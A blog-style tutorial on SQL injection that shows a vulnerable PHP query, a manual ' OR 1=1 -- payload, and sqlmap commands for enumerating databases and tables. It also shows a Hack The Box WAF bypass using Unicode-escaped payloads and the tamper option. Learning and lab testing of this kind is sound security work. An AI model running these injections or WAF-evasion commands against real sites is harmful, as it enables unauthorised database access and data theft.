It’s important to know how SQL and database’s work before trying this out. This is a method to automate and speed up SQL Injection attacks.
You can check the following link to learn more about it
Another thing to note is that this is just to speed up the process and not a replacement to learn how SQL injection(sqli) actually works.
There are two types of sqli you can mainly attempt, one is in the url and the other is in a form.
I’ll go over the basic structure of both and then explore the various parameters SQLmap has to offer.
SQL injections manually work as well for example take the PHP script below,
(NOTE it is similar in other languages such as Python)
$sql="SELECT * FROM login where username='".$user."';"
The ‘sql’ variable stores the sql query that is to be executed.
Effectively, if the html form had the name with the details entered as
Name: ‘ OR 1=1 –
The sql statement effectively becomes,
SELECT * FROM login where username='' OR 1=1 --
The “--” at the end comments out anything else.
If we were to then perform reconnaissance such as
SELECT * FROM login where username=''; show tables;
Doing this manually is very time consuming SQL map automates it.
SQLMAP: In the terminal of your parrot/kali machine
sqlmap -u https://www.URLTOINJECT.com/listproducts.php?search=test
This works for websites like the one above that have search parameters in the url.
For websites that have a form like structure which in my opinion is more common the statement needs to be adjusted as follows,
sqlmap -u https://www.URLTOINJECT.com/ --data="username=example;password=test"
The data field specifies the field you want to inject. Adding the following parameters do the following
–method=POST can use GET,PUT as needed
–current-db Retrieves the current DB
–dbs Enumerate the databases
–tables Enumerate the tables
–count retrieve the number of entries
-D To select the database
-T To select the table
Since I’ve written this I used SQLMAP more and I’m going to add more features that I’ve used.
Firstly not every sqlinjection is as a form or in the url. So let’s look at using a request for sqlmap. Say you captured a request from ZAP/BURP and needs to be tested.
-r is the option to use for a request.
sqlmap -r request.txt -p user
request.txt
POST / HTTP/1.1
Content-Type: application/json
Host: docker.hackthebox.eu:31181
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Length: 21
{
"user":"test"
}
This request is a post request but it is in JSON form. This isn’t really like form data being sent because of the JSON formatting. -p tells sqlmap which parameter we are injecting.-r is good to use because then you can use it for scripting or to separate the url from the bash command as well as for attacking additional parameters. If you were to inject a cookie or a header use –cookie=”cookiename=*” or –header. The * indicates the cookie to be used for injection.
While doing wafwaf from HTB I had to bypass a web application firewall. It blocked most special characters and sql keywords. The solution to it was to use JSON unicode format.
SELECT - UTF-8 (normal)
\u0053\u0045\u004c\u0045\u0043\u0054 - Unicode format
The waf would not allow select to run but in unicode it would not be detected. So if you wanted to send all your payloads in this format we could use the option –tamper.
sqlmap -r request.txt --tamper=charunicodeescape -p user
This essentially converts the payload to the unicode format like I showed above. Tamper is not limited to this option alone, use –list-tampers option to see what scripts are available to use for the situation when warranted.
Other parameters can be found below